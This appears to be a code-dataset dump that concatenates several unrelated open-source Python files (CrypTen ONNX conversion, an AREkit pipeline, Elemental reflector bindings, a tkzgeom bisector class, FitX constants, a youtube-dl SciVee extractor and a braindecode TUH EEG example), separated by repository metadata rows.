elif len(attr.ints) > 0:
return list(attr.ints)
elif len(attr.floats) > 0:
return list(attr.floats)
raise ValueError("Unknown attribute type for attribute %s." % attr.name)
def _get_operator_class(node_op_type, attributes):
"""
Returns the `crypten.nn.Module` type corresponding to an ONNX node.
"""
crypten_class = getattr(
module, node_op_type, ONNX_TO_CRYPTEN.get(node_op_type, None)
)
if crypten_class is None:
raise ValueError(f"CrypTen does not support ONNX op {node_op_type}.")
return crypten_class
def _update_onnx_symbolic_registry():
"""
Updates the ONNX symbolic registry for operators that need a CrypTen-specific
implementation and custom operators.
"""
# update PyTorch's symbolic ONNX registry to output different functions:
for version_key, version_val in sym_registry._registry.items():
for function_key in version_val.keys():
if function_key == "softmax":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_softmax
if function_key == "log_softmax":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_logsoftmax
if function_key == "dropout":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_dropout
if function_key == "feature_dropout":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_feature_dropout
@sym_help.parse_args("v", "i", "none")
def _onnx_crypten_softmax(g, input, dim, dtype=None):
"""
This function converts PyTorch's Softmax module to a Softmax module in
the ONNX model. It overrides PyTorch's default conversion of Softmax module
to a sequence of Exp, ReduceSum and Div modules, since this default
conversion can cause numerical overflow when applied to CrypTensors.
"""
result = g.op("Softmax", input, axis_i=dim)
if dtype and dtype.node().kind() != "prim::Constant":
parsed_dtype = sym_help._get_const(dtype, "i", "dtype")
result = g.op("Cast", result, to_i=sym_help.scalar_type_to_onnx[parsed_dtype])
return result
@sym_help.parse_args("v", "i", "none")
def _onnx_crypten_logsoftmax(g, input, dim, dtype=None):
"""
This function converts PyTorch's LogSoftmax module to a LogSoftmax module in
the ONNX model. It overrides PyTorch's default conversion of LogSoftmax module
to avoid potentially creating Transpose operators.
"""
result = g.op("LogSoftmax", input, axis_i=dim)
if dtype and dtype.node().kind() != "prim::Constant":
parsed_dtype = sym_help._get_const(dtype, "i", "dtype")
result = g.op("Cast", result, to_i=sym_help.scalar_type_to_onnx[parsed_dtype])
return result
@sym_help.parse_args("v", "f", "i")
def _onnx_crypten_dropout(g, input, p, train):
"""
This function converts PyTorch's Dropout module to a Dropout module in the ONNX
model. It overrides PyTorch's default implementation to ignore the Dropout module
during the conversion. PyTorch assumes that ONNX models are only used for
inference and therefore Dropout modules are not required in the ONNX model.
However, CrypTen needs to convert ONNX models to trainable
CrypTen models, and so the Dropout module needs to be included in the
CrypTen-specific conversion.
"""
r, _ = g.op("Dropout", input, ratio_f=p, outputs=2)
return r
@sym_help.parse_args("v", "f", "i")
def _onnx_crypten_feature_dropout(g, input, p, train):
"""
This function converts PyTorch's DropoutNd module to a DropoutNd module in the ONNX
model. It overrides PyTorch's default implementation to ignore the DropoutNd module
during the conversion. PyTorch assumes that ONNX models are only used for
inference and therefore DropoutNd modules are not required in the ONNX model.
However, CrypTen needs to convert ONNX models to trainable
CrypTen models, and so the DropoutNd module needs to be included in the
CrypTen-specific conversion.
"""
r, _ = g.op("DropoutNd", input, ratio_f=p, outputs=2)
return r
| 34.925816
| 87
| 0.693203
| 0
| 0
| 0
| 0
| 2,641
| 0.224384
| 0
| 0
| 4,972
| 0.42243
|
3bf70a1a9f2bab5e2d13cf95f5bb6e7cbc23fec9
| 3,582
|
py
|
Python
|
examples/pipeline.py
|
nicolay-r/AREk
|
19c39ec0dc9a17464cade03b9c4da0c6d1d21191
|
[
"MIT"
] | null | null | null |
examples/pipeline.py
|
nicolay-r/AREk
|
19c39ec0dc9a17464cade03b9c4da0c6d1d21191
|
[
"MIT"
] | null | null | null |
examples/pipeline.py
|
nicolay-r/AREk
|
19c39ec0dc9a17464cade03b9c4da0c6d1d21191
|
[
"MIT"
] | null | null | null |
from arekit.common.data.input.providers.label.multiple import MultipleLabelProvider
from arekit.common.data.row_ids.multiple import MultipleIDProvider
from arekit.common.data.storages.base import BaseRowsStorage
from arekit.common.data.views.samples import BaseSampleStorageView
from arekit.common.experiment.data_type import DataType
from arekit.common.labels.scaler import BaseLabelScaler
from arekit.contrib.experiment_rusentrel.labels.scalers.three import ThreeLabelScaler
from arekit.contrib.networks.context.architectures.pcnn import PiecewiseCNN
from arekit.contrib.networks.context.configurations.cnn import CNNConfig
from arekit.contrib.networks.core.ctx_inference import InferenceContext
from arekit.contrib.networks.core.feeding.bags.collection.single import SingleBagsCollection
from arekit.contrib.networks.core.input.helper_embedding import EmbeddingHelper
from arekit.contrib.networks.core.model import BaseTensorflowModel
from arekit.contrib.networks.core.model_io import NeuralNetworkModelIO
from arekit.contrib.networks.core.predict.provider import BasePredictProvider
from arekit.contrib.networks.core.predict.tsv_writer import TsvPredictWriter
from arekit.contrib.networks.shapes import NetworkInputShapes
from examples.input import EXAMPLES
from examples.repository import pipeline_serialize
def pipeline_infer(labels_scaler):
assert(isinstance(labels_scaler, BaseLabelScaler))
# Step 4. Deserialize data
network = PiecewiseCNN()
config = CNNConfig()
config.set_term_embedding(EmbeddingHelper.load_vocab("embedding.txt"))
inference_ctx = InferenceContext.create_empty()
inference_ctx.initialize(
dtypes=[DataType.Test],
create_samples_view_func=lambda data_type: BaseSampleStorageView(
storage=BaseRowsStorage.from_tsv("samples.txt"),
row_ids_provider=MultipleIDProvider()),
has_model_predefined_state=True,
vocab=EmbeddingHelper.load_vocab("vocab.txt"),
labels_count=3,
input_shapes=NetworkInputShapes(iter_pairs=[
(NetworkInputShapes.FRAMES_PER_CONTEXT, config.FramesPerContext),
(NetworkInputShapes.TERMS_PER_CONTEXT, config.TermsPerContext),
(NetworkInputShapes.SYNONYMS_PER_CONTEXT, config.SynonymsPerContext),
]),
bag_size=config.BagSize)
# Step 5. Model preparation.
model = BaseTensorflowModel(
nn_io=NeuralNetworkModelIO(
target_dir=".model",
full_model_name="PCNN",
model_name_tag="_"),
network=network,
config=config,
inference_ctx=inference_ctx,
bags_collection_type=SingleBagsCollection, # Используем на вход 1 пример.
)
model.predict()
# Step 6. Gather annotated contexts onto document level.
labeled_samples = model.get_labeled_samples_collection(data_type=DataType.Test)
predict_provider = BasePredictProvider()
# TODO. For now it is limited to tsv.
with TsvPredictWriter(filepath="out.txt") as out:
title, contents_it = predict_provider.provide(
sample_id_with_uint_labels_iter=labeled_samples.iter_non_duplicated_labeled_sample_row_ids(),
labels_scaler=labels_scaler)
out.write(title=title,
contents_it=contents_it)
if __name__ == '__main__':
text = EXAMPLES["simple"]
labels_scaler = ThreeLabelScaler()
label_provider = MultipleLabelProvider(label_scaler=labels_scaler)
pipeline_serialize(sentences_text_list=text, label_provider=label_provider)
pipeline_infer(labels_scaler)
| 40.704545
| 105
| 0.769961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 282
| 0.078246
|
3bf77e53ccae2099f5deb07947c3ee02b77cf7b8
| 9,038
|
py
|
Python
|
python/lapack_like/reflect.py
|
justusc/Elemental
|
145ccb28411f3f0c65ca30ecea776df33297e4ff
|
[
"BSD-3-Clause"
] | null | null | null |
python/lapack_like/reflect.py
|
justusc/Elemental
|
145ccb28411f3f0c65ca30ecea776df33297e4ff
|
[
"BSD-3-Clause"
] | null | null | null |
python/lapack_like/reflect.py
|
justusc/Elemental
|
145ccb28411f3f0c65ca30ecea776df33297e4ff
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Copyright (c) 2009-2015, Jack Poulson
# All rights reserved.
#
# This file is part of Elemental and is under the BSD 2-Clause License,
# which can be found in the LICENSE file in the root directory, or at
# http://opensource.org/licenses/BSD-2-Clause
#
from ..core import *
import ctypes
# Apply packed reflectors
# =======================
lib.ElApplyPackedReflectors_s.argtypes = \
lib.ElApplyPackedReflectors_d.argtypes = \
lib.ElApplyPackedReflectors_c.argtypes = \
lib.ElApplyPackedReflectors_z.argtypes = \
lib.ElApplyPackedReflectorsDist_s.argtypes = \
lib.ElApplyPackedReflectorsDist_d.argtypes = \
lib.ElApplyPackedReflectorsDist_c.argtypes = \
lib.ElApplyPackedReflectorsDist_z.argtypes = \
[c_uint,c_uint,c_uint,c_uint,iType,c_void_p,c_void_p,c_void_p]
def ApplyPackedReflectors(side,uplo,dir,order,offset,H,t,A):
if type(H) is not type(t) or type(t) is not type(A):
raise Exception('Matrix types of {H,t,A} must match')
if H.tag != t.tag or t.tag != A.tag:
raise Exception('Datatypes of {H,t,A} must match')
args = [side,uplo,dir,order,offset,H.obj,t.obj,A.obj]
if type(H) is Matrix:
if H.tag == sTag: lib.ElApplyPackedReflectors_s(*args)
elif H.tag == dTag: lib.ElApplyPackedReflectors_d(*args)
elif H.tag == cTag: lib.ElApplyPackedReflectors_c(*args)
elif H.tag == zTag: lib.ElApplyPackedReflectors_z(*args)
else: DataExcept()
elif type(H) is DistMatrix:
if H.tag == sTag: lib.ElApplyPackedReflectorsDist_s(*args)
elif H.tag == dTag: lib.ElApplyPackedReflectorsDist_d(*args)
elif H.tag == cTag: lib.ElApplyPackedReflectorsDist_c(*args)
elif H.tag == zTag: lib.ElApplyPackedReflectorsDist_z(*args)
else: DataExcept()
else: TypeExcept()
# Expand packed reflectors
# ========================
lib.ElExpandPackedReflectors_s.argtypes = \
lib.ElExpandPackedReflectors_d.argtypes = \
lib.ElExpandPackedReflectors_c.argtypes = \
lib.ElExpandPackedReflectors_z.argtypes = \
lib.ElExpandPackedReflectorsDist_s.argtypes = \
lib.ElExpandPackedReflectorsDist_d.argtypes = \
lib.ElExpandPackedReflectorsDist_c.argtypes = \
lib.ElExpandPackedReflectorsDist_z.argtypes = \
[c_uint,c_uint,iType,c_void_p,c_void_p]
def ExpandPackedReflectors(uplo,dir,offset,H,t):
if type(H) is not type(t):
raise Exception('Types of H and t must match')
if H.tag != t.tag:
raise Exception('Datatypes of H and t must match')
args = [uplo,dir,offset,H.obj,t.obj]
if type(H) is Matrix:
if H.tag == sTag: lib.ElExpandPackedReflectors_s(*args)
elif H.tag == dTag: lib.ElExpandPackedReflectors_d(*args)
elif H.tag == cTag: lib.ElExpandPackedReflectors_c(*args)
elif H.tag == zTag: lib.ElExpandPackedReflectors_z(*args)
else: DataExcept()
elif type(H) is DistMatrix:
if H.tag == sTag: lib.ElExpandPackedReflectorsDist_s(*args)
elif H.tag == dTag: lib.ElExpandPackedReflectorsDist_d(*args)
elif H.tag == cTag: lib.ElExpandPackedReflectorsDist_c(*args)
elif H.tag == zTag: lib.ElExpandPackedReflectorsDist_z(*args)
else: DataExcept()
else: TypeExcept()
# Hyperbolic reflector
# ====================
# Left application
# ----------------
lib.ElLeftHyperbolicReflector_s.argtypes = \
[POINTER(sType),c_void_p,POINTER(sType)]
lib.ElLeftHyperbolicReflector_d.argtypes = \
[POINTER(dType),c_void_p,POINTER(dType)]
lib.ElLeftHyperbolicReflector_c.argtypes = \
[POINTER(cType),c_void_p,POINTER(cType)]
lib.ElLeftHyperbolicReflector_z.argtypes = \
[POINTER(zType),c_void_p,POINTER(zType)]
lib.ElLeftHyperbolicReflectorDist_s.argtypes = \
[POINTER(sType),c_void_p,POINTER(sType)]
lib.ElLeftHyperbolicReflectorDist_d.argtypes = \
[POINTER(dType),c_void_p,POINTER(dType)]
lib.ElLeftHyperbolicReflectorDist_c.argtypes = \
[POINTER(cType),c_void_p,POINTER(cType)]
lib.ElLeftHyperbolicReflectorDist_z.argtypes = \
[POINTER(zType),c_void_p,POINTER(zType)]
def LeftHyperbolicReflector(chi,x):
alpha = TagToType(x.tag)(chi)
tau = TagToType(x.tag)()
args = [pointer(alpha),x.obj,pointer(tau)]
if type(x) is Matrix:
if x.tag == sTag: lib.ElLeftHyperbolicReflector_s(*args)
elif x.tag == dTag: lib.ElLeftHyperbolicReflector_d(*args)
elif x.tag == cTag: lib.ElLeftHyperbolicReflector_c(*args)
elif x.tag == zTag: lib.ElLeftHyperbolicReflector_z(*args)
else: DataExcept()
elif type(x) is DistMatrix:
if x.tag == sTag: lib.ElLeftHyperbolicReflectorDist_s(*args)
elif x.tag == dTag: lib.ElLeftHyperbolicReflectorDist_d(*args)
elif x.tag == cTag: lib.ElLeftHyperbolicReflectorDist_c(*args)
elif x.tag == zTag: lib.ElLeftHyperbolicReflectorDist_z(*args)
else: DataExcept()
else: TypeExcept()
return alpha, tau
# Right application
# -----------------
lib.ElRightHyperbolicReflector_s.argtypes = \
[POINTER(sType),c_void_p,POINTER(sType)]
lib.ElRightHyperbolicReflector_d.argtypes = \
[POINTER(dType),c_void_p,POINTER(dType)]
lib.ElRightHyperbolicReflector_c.argtypes = \
[POINTER(cType),c_void_p,POINTER(cType)]
lib.ElRightHyperbolicReflector_z.argtypes = \
[POINTER(zType),c_void_p,POINTER(zType)]
lib.ElRightHyperbolicReflectorDist_s.argtypes = \
[POINTER(sType),c_void_p,POINTER(sType)]
lib.ElRightHyperbolicReflectorDist_d.argtypes = \
[POINTER(dType),c_void_p,POINTER(dType)]
lib.ElRightHyperbolicReflectorDist_c.argtypes = \
[POINTER(cType),c_void_p,POINTER(cType)]
lib.ElRightHyperbolicReflectorDist_z.argtypes = \
[POINTER(zType),c_void_p,POINTER(zType)]
def RightHyperbolicReflector(chi,x):
alpha = TagToType(x.tag)(chi)
tau = TagToType(x.tag)()
args = [pointer(alpha),x.obj,pointer(tau)]
if type(x) is Matrix:
if x.tag == sTag: lib.ElRightHyperbolicReflector_s(*args)
elif x.tag == dTag: lib.ElRightHyperbolicReflector_d(*args)
elif x.tag == cTag: lib.ElRightHyperbolicReflector_c(*args)
elif x.tag == zTag: lib.ElRightHyperbolicReflector_z(*args)
else: DataExcept()
elif type(x) is DistMatrix:
if x.tag == sTag: lib.ElRightHyperbolicReflectorDist_s(*args)
elif x.tag == dTag: lib.ElRightHyperbolicReflectorDist_d(*args)
elif x.tag == cTag: lib.ElRightHyperbolicReflectorDist_c(*args)
elif x.tag == zTag: lib.ElRightHyperbolicReflectorDist_z(*args)
else: DataExcept()
else: TypeExcept()
return alpha, tau
# Householder reflector
# =====================
# Left application
# ----------------
lib.ElLeftReflector_s.argtypes = [POINTER(sType),c_void_p,POINTER(sType)]
lib.ElLeftReflector_d.argtypes = [POINTER(dType),c_void_p,POINTER(dType)]
lib.ElLeftReflector_c.argtypes = [POINTER(cType),c_void_p,POINTER(cType)]
lib.ElLeftReflector_z.argtypes = [POINTER(zType),c_void_p,POINTER(zType)]
lib.ElLeftReflectorDist_s.argtypes = [POINTER(sType),c_void_p,POINTER(sType)]
lib.ElLeftReflectorDist_d.argtypes = [POINTER(dType),c_void_p,POINTER(dType)]
lib.ElLeftReflectorDist_c.argtypes = [POINTER(cType),c_void_p,POINTER(cType)]
lib.ElLeftReflectorDist_z.argtypes = [POINTER(zType),c_void_p,POINTER(zType)]
def LeftReflector(chi,x):
alpha = TagToType(x.tag)(chi)
tau = TagToType(x.tag)()
args = [pointer(alpha),x.obj,pointer(tau)]
if type(x) is Matrix:
if x.tag == sTag: lib.ElLeftReflector_s(*args)
elif x.tag == dTag: lib.ElLeftReflector_d(*args)
elif x.tag == cTag: lib.ElLeftReflector_c(*args)
elif x.tag == zTag: lib.ElLeftReflector_z(*args)
else: DataExcept()
elif type(x) is DistMatrix:
if x.tag == sTag: lib.ElLeftReflectorDist_s(*args)
elif x.tag == dTag: lib.ElLeftReflectorDist_d(*args)
elif x.tag == cTag: lib.ElLeftReflectorDist_c(*args)
elif x.tag == zTag: lib.ElLeftReflectorDist_z(*args)
else: DataExcept()
else: TypeExcept()
return alpha, tau
# Right application
# -----------------
lib.ElRightReflector_s.argtypes = [POINTER(sType),c_void_p,POINTER(sType)]
lib.ElRightReflector_d.argtypes = [POINTER(dType),c_void_p,POINTER(dType)]
lib.ElRightReflector_c.argtypes = [POINTER(cType),c_void_p,POINTER(cType)]
lib.ElRightReflector_z.argtypes = [POINTER(zType),c_void_p,POINTER(zType)]
lib.ElRightReflectorDist_s.argtypes = [POINTER(sType),c_void_p,POINTER(sType)]
lib.ElRightReflectorDist_d.argtypes = [POINTER(dType),c_void_p,POINTER(dType)]
lib.ElRightReflectorDist_c.argtypes = [POINTER(cType),c_void_p,POINTER(cType)]
lib.ElRightReflectorDist_z.argtypes = [POINTER(zType),c_void_p,POINTER(zType)]
def RightReflector(chi,x):
alpha = TagToType(x.tag)(chi)
tau = TagToType(x.tag)()
args = [pointer(alpha),x.obj,pointer(tau)]
if type(x) is Matrix:
if x.tag == sTag: lib.ElRightReflector_s(*args)
elif x.tag == dTag: lib.ElRightReflector_d(*args)
elif x.tag == cTag: lib.ElRightReflector_c(*args)
elif x.tag == zTag: lib.ElRightReflector_z(*args)
else: DataExcept()
elif type(x) is DistMatrix:
if x.tag == sTag: lib.ElRightReflectorDist_s(*args)
elif x.tag == dTag: lib.ElRightReflectorDist_d(*args)
elif x.tag == cTag: lib.ElRightReflectorDist_c(*args)
elif x.tag == zTag: lib.ElRightReflectorDist_z(*args)
else: DataExcept()
else: TypeExcept()
return alpha, tau
| 42.834123
| 78
| 0.731356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 727
| 0.080438
|
3bf87ad7597d41df2c5bff20fab72d6e34dbefa1
| 2,443
|
py
|
Python
|
src/PointClasses/Bisector.py
|
Lovely-XPP/tkzgeom
|
bf68e139dc05f759542d6611f4dc07f4f2727b92
|
[
"MIT"
] | 41
|
2021-11-24T05:54:08.000Z
|
2022-03-26T10:19:30.000Z
|
src/PointClasses/Bisector.py
|
Lovely-XPP/tkzgeom
|
bf68e139dc05f759542d6611f4dc07f4f2727b92
|
[
"MIT"
] | 1
|
2022-02-28T04:34:51.000Z
|
2022-03-07T10:49:27.000Z
|
src/PointClasses/Bisector.py
|
Lovely-XPP/tkzgeom
|
bf68e139dc05f759542d6611f4dc07f4f2727b92
|
[
"MIT"
] | 10
|
2021-11-24T07:35:17.000Z
|
2022-03-25T18:42:14.000Z
|
from Point import Point
import Constant as c
from GeometryMath import bisector_point
class Bisector(Point):
def __init__(self, item):
"""Construct Bisector."""
Point.__init__(self, item)
self.item["sub_type"] = c.Point.Definition.BISECTOR
def tikzify(self):
return '\\tkzDefLine[bisector](%s,%s,%s)\\tkzGetPoint{%s}' % (self.item["definition"]["A"],
self.item["definition"]["B"],
self.item["definition"]["C"],
self.get_id())
def recompute_canvas(self, items, window, width, height):
A = items[self.depends_on()[0]].get_canvas_coordinates()
B = items[self.depends_on()[1]].get_canvas_coordinates()
C = items[self.depends_on()[2]].get_canvas_coordinates()
self.set_canvas_coordinates(*bisector_point(A, B, C))
def __str__(self):
return "Bisector point (%s) of angle %s"\
% (self.item["id"], self.item["definition"]["A"]+self.item["definition"]["B"]+self.item["definition"]["C"])
def definition_builder(self, data, items=None):
if len(data) == 3:
return dict(zip(["A", "B", "C"], data))
def parse_into_definition(self, arguments, items):
# arguments length condition
if len(arguments) != 3:
return None
# all arguments are members of the regular expression for argument name
if not all(map(lambda x: self.name_pattern(x), arguments)):
return None
# all arguments are items that already exist
if not all(map(lambda x: x in items, arguments)):
return None
# the type of all arguments is of a certain type
if not all(map(lambda x: items[x].item["type"] == 'point', arguments)):
return None
# self-reference condition (self-reference is not permitted)
if self.get_id() in arguments:
return None
# condition for cross reference
for id in arguments:
deep_depends = items[id].deep_depends_on(items)
if self.get_id() in deep_depends:
return None
return self.definition_builder(arguments)
@staticmethod
def static_patterns():
return ["ppp"]
def patterns(self):
return ["ppp"]
| 40.04918
| 119
| 0.56447
| 2,355
| 0.963979
| 0
| 0
| 63
| 0.025788
| 0
| 0
| 527
| 0.215718
|
3bf883b35e2fe868219f30a0db3d466b114010f3
| 354
|
py
|
Python
|
custom_components/fitx/const.py
|
Raukze/home-assistant-fitx
|
2808200e0e87a0559b927dc013765bf1cd20030e
|
[
"MIT"
] | 3
|
2022-03-02T07:49:47.000Z
|
2022-03-18T08:59:05.000Z
|
custom_components/fitx/const.py
|
Raukze/home-assistant-fitx
|
2808200e0e87a0559b927dc013765bf1cd20030e
|
[
"MIT"
] | null | null | null |
custom_components/fitx/const.py
|
Raukze/home-assistant-fitx
|
2808200e0e87a0559b927dc013765bf1cd20030e
|
[
"MIT"
] | null | null | null |
DOMAIN = "fitx"
ICON = "mdi:weight-lifter"
CONF_LOCATIONS = 'locations'
CONF_ID = 'id'
ATTR_ADDRESS = "address"
ATTR_STUDIO_NAME = "studioName"
ATTR_ID = CONF_ID
ATTR_URL = "url"
DEFAULT_ENDPOINT = "https://www.fitx.de/fitnessstudios/{id}"
REQUEST_METHOD = "GET"
REQUEST_AUTH = None
REQUEST_HEADERS = None
REQUEST_PAYLOAD = None
REQUEST_VERIFY_SSL = True
| 25.285714
| 60
| 0.762712
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 112
| 0.316384
|
3bf93c870b2bc30c3baf9567a64d06171558f06b
| 1,894
|
py
|
Python
|
youtube_dl/extractor/scivee.py
|
Logmytech/youtube-dl-QT
|
1497297719a95c4f70fbfa32e0fa4e38cdd475dc
|
[
"MIT"
] | 5
|
2016-04-25T16:26:07.000Z
|
2021-04-28T16:10:29.000Z
|
youtube_dl/extractor/scivee.py
|
Logmytech/youtube-dl-QT
|
1497297719a95c4f70fbfa32e0fa4e38cdd475dc
|
[
"MIT"
] | 5
|
2016-04-22T01:33:31.000Z
|
2016-08-04T15:33:19.000Z
|
youtube_dl/extractor/scivee.py
|
Logmytech/youtube-dl-QT
|
1497297719a95c4f70fbfa32e0fa4e38cdd475dc
|
[
"MIT"
] | 5
|
2020-10-25T09:18:58.000Z
|
2021-05-23T22:57:55.000Z
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import int_or_none
class SciVeeIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?scivee\.tv/node/(?P<id>\d+)'
_TEST = {
'url': 'http://www.scivee.tv/node/62352',
'md5': 'b16699b74c9e6a120f6772a44960304f',
'info_dict': {
'id': '62352',
'ext': 'mp4',
'title': 'Adam Arkin at the 2014 DOE JGI Genomics of Energy & Environment Meeting',
'description': 'md5:81f1710638e11a481358fab1b11059d7',
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
# annotations XML is malformed
annotations = self._download_webpage(
'http://www.scivee.tv/assets/annotations/%s' % video_id, video_id, 'Downloading annotations')
title = self._html_search_regex(r'<title>([^<]+)</title>', annotations, 'title')
description = self._html_search_regex(r'<abstract>([^<]+)</abstract>', annotations, 'abstract', fatal=False)
filesize = int_or_none(self._html_search_regex(
r'<filesize>([^<]+)</filesize>', annotations, 'filesize', fatal=False))
formats = [
{
'url': 'http://www.scivee.tv/assets/audio/%s' % video_id,
'ext': 'mp3',
'format_id': 'audio',
},
{
'url': 'http://www.scivee.tv/assets/video/%s' % video_id,
'ext': 'mp4',
'format_id': 'video',
'filesize': filesize,
},
]
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': 'http://www.scivee.tv/assets/videothumb/%s' % video_id,
'formats': formats,
}
| 33.22807
| 116
| 0.541711
| 1,773
| 0.936114
| 0
| 0
| 0
| 0
| 0
| 0
| 745
| 0.393347
|
3bfa7757212343833fdcee31409e1364ca82a73d
| 11,790
|
py
|
Python
|
examples/plot_tuh_eeg_corpus.py
|
SciMK/braindecode
|
65b8de3e8a542e299996c0917ea3383aea5a9a69
|
[
"BSD-3-Clause"
] | null | null | null |
examples/plot_tuh_eeg_corpus.py
|
SciMK/braindecode
|
65b8de3e8a542e299996c0917ea3383aea5a9a69
|
[
"BSD-3-Clause"
] | null | null | null |
examples/plot_tuh_eeg_corpus.py
|
SciMK/braindecode
|
65b8de3e8a542e299996c0917ea3383aea5a9a69
|
[
"BSD-3-Clause"
] | null | null | null |
"""Process a big data EEG resource (TUH EEG Corpus)
===================================================
In this example, we showcase usage of the Temple University Hospital EEG Corpus
(https://www.isip.piconepress.com/projects/tuh_eeg/html/downloads.shtml#c_tueg)
including simple preprocessing steps as well as cutting of compute windows.
"""
# Author: Lukas Gemein <l.gemein@gmail.com>
#
# License: BSD (3-clause)
import os
import tempfile
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('seaborn')
import mne
from braindecode.datasets import TUH
from braindecode.preprocessing import preprocess, Preprocessor, create_fixed_length_windows
from braindecode.datautil.serialization import load_concat_dataset
mne.set_log_level('ERROR') # avoid messages everytime a window is extracted
###############################################################################
# If you want to try this code with the actual data, please delete the next
# section. We are required to mock some dataset functionality, since the data
# is not available at creation time of this example.
from unittest import mock
FAKE_PATHS = {
'tuh_eeg/v1.1.0/edf/01_tcp_ar/000/00000000/s001_2015_12_30/00000000_s001_t000.edf': b'0 00000000 M 01-JAN-1978 00000000 Age:37 ', # noqa E501
'tuh_eeg/v1.1.0/edf/02_tcp_le/000/00000058/s001_2003_02_05/00000058_s001_t000.edf': b'0 00000058 M 01-JAN-2003 00000058 Age:0.0109 ', # noqa E501
'tuh_eeg/v1.2.0/edf/03_tcp_ar_a/149/00014928/s004_2016_01_15/00014928_s004_t007.edf': b'0 00014928 F 01-JAN-1933 00014928 Age:83 ', # noqa E501
}
def _fake_raw(*args, **kwargs):
sfreq = 10
ch_names = [
'EEG A1-REF', 'EEG A2-REF',
'EEG FP1-REF', 'EEG FP2-REF', 'EEG F3-REF', 'EEG F4-REF', 'EEG C3-REF',
'EEG C4-REF', 'EEG P3-REF', 'EEG P4-REF', 'EEG O1-REF', 'EEG O2-REF',
'EEG F7-REF', 'EEG F8-REF', 'EEG T3-REF', 'EEG T4-REF', 'EEG T5-REF',
'EEG T6-REF', 'EEG FZ-REF', 'EEG CZ-REF', 'EEG PZ-REF']
duration_min = 6
data = np.random.randn(len(ch_names), duration_min*sfreq*60)
info = mne.create_info(ch_names=ch_names, sfreq=sfreq, ch_types='eeg')
raw = mne.io.RawArray(data=data, info=info)
return raw
def _get_header(*args):
return FAKE_PATHS[args[0]]
@mock.patch('glob.glob', return_value=FAKE_PATHS.keys())
@mock.patch('mne.io.read_raw_edf', new=_fake_raw)
@mock.patch('braindecode.datasets.tuh._read_edf_header', new=_get_header)
def mock_get_data(mock_glob):
tuh = TUH(
path='',
recording_ids=None,
target_name=None,
preload=False,
add_physician_reports=False,
)
return tuh
tuh = mock_get_data()
###############################################################################
# We start by creating a TUH dataset. First, the class generates a description
# of the recordings in `TUH_PATH` (which is later accessible as
# `tuh.description`) without actually touching the files. This will parse
# information from file paths such as patient id, recording data, etc and should
# be really fast. Afterwards, the files are sorted chronologically by year,
# month, day, patient id, recording session and segment.
# In the following, a subset of the description corresponding to `recording_ids`
# is used.
# Afterwards, the files will be iterated a second time, slower than before.
# The files are now actually touched. Additional information about subjects
# like age and gender are parsed directly from the EDF file header. If existent,
# the physician report is added to the description. Furthermore, the recordings
# are read with `mne.io.read_raw_edf` with `preload=False`. Finally, we will get
# a `BaseConcatDataset` of `BaseDatasets` each holding a single
# `nme.io.Raw` which is fully compatible with other braindecode functionalities.
# Uncomment the lines below to actually run this code on real data.
# tuh = TUH(
# path=<TUH_PATH>, # please insert actual path to data here
# recording_ids=None,
# target_name=None,
# preload=False,
# add_physician_reports=False,
# )
###############################################################################
# We can easily create descriptive statistics using the description `DataFrame`,
# for example an age histogram split by gender of patients.
fig, ax = plt.subplots(1, 1, figsize=(15, 5))
genders = tuh.description.gender.unique()
x = [tuh.description.age[tuh.description.gender == g] for g in genders]
ax.hist(
x=x,
stacked=True,
bins=np.arange(100, dtype=int),
alpha=.5,
)
ax.legend(genders)
ax.set_xlabel('Age [years]')
ax.set_ylabel('Count')
###############################################################################
# Next, we will perform some preprocessing steps. First, we will do some
# selection of available recordings based on the duration. We will select those
# recordings, that have at least five minutes duration. Data is not loaded here.
def select_by_duration(ds, tmin=0, tmax=None):
# determine length of the recordings and select based on tmin and tmax
duration = ds.description.n_samples / ds.description.sfreq
duration = duration[duration >= tmin]
if tmax is None:
tmax = np.inf
duration = duration[duration <= tmax]
split_ids = list(duration.index)
splits = ds.split(split_ids)
split = splits['0']
return split
tmin = 5 * 60
tmax = None
tuh = select_by_duration(tuh, tmin, tmax)
###############################################################################
# Next, we will discard all recordings that have an incomplete channel
# configuration (wrt the channels that we are interested in, i.e. the 21
# channels of the international 10-20-placement). The dataset is subdivided into
# recordings with 'le' and 'ar' reference which we will have to consider. Data
# is not loaded here.
short_ch_names = sorted([
'A1', 'A2',
'FP1', 'FP2', 'F3', 'F4', 'C3', 'C4', 'P3', 'P4', 'O1', 'O2',
'F7', 'F8', 'T3', 'T4', 'T5', 'T6', 'FZ', 'CZ', 'PZ'])
ar_ch_names = sorted([
'EEG A1-REF', 'EEG A2-REF',
'EEG FP1-REF', 'EEG FP2-REF', 'EEG F3-REF', 'EEG F4-REF', 'EEG C3-REF',
'EEG C4-REF', 'EEG P3-REF', 'EEG P4-REF', 'EEG O1-REF', 'EEG O2-REF',
'EEG F7-REF', 'EEG F8-REF', 'EEG T3-REF', 'EEG T4-REF', 'EEG T5-REF',
'EEG T6-REF', 'EEG FZ-REF', 'EEG CZ-REF', 'EEG PZ-REF'])
le_ch_names = sorted([
'EEG A1-LE', 'EEG A2-LE',
'EEG FP1-LE', 'EEG FP2-LE', 'EEG F3-LE', 'EEG F4-LE', 'EEG C3-LE',
'EEG C4-LE', 'EEG P3-LE', 'EEG P4-LE', 'EEG O1-LE', 'EEG O2-LE',
'EEG F7-LE', 'EEG F8-LE', 'EEG T3-LE', 'EEG T4-LE', 'EEG T5-LE',
'EEG T6-LE', 'EEG FZ-LE', 'EEG CZ-LE', 'EEG PZ-LE'])
assert len(short_ch_names) == len(ar_ch_names) == len(le_ch_names)
ar_ch_mapping = {ch_name: short_ch_name for ch_name, short_ch_name in zip(
ar_ch_names, short_ch_names)}
le_ch_mapping = {ch_name: short_ch_name for ch_name, short_ch_name in zip(
le_ch_names, short_ch_names)}
